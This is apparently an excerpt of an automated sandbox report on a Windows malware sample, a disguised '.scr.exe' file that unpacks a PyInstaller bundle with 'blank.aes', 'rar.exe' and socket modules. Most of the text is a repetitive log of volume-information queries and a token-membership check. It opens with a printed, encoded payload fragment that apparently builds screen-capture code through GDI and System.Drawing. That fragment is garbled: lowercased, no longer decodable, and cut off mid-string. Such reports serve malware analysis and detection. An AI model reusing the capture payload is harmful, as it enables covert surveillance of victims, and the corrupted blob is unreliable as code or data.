aaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ECB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 68_2_00007FF7F7ECB340
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE39E40 cpuid 0_2_00007FF73AE39E40
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
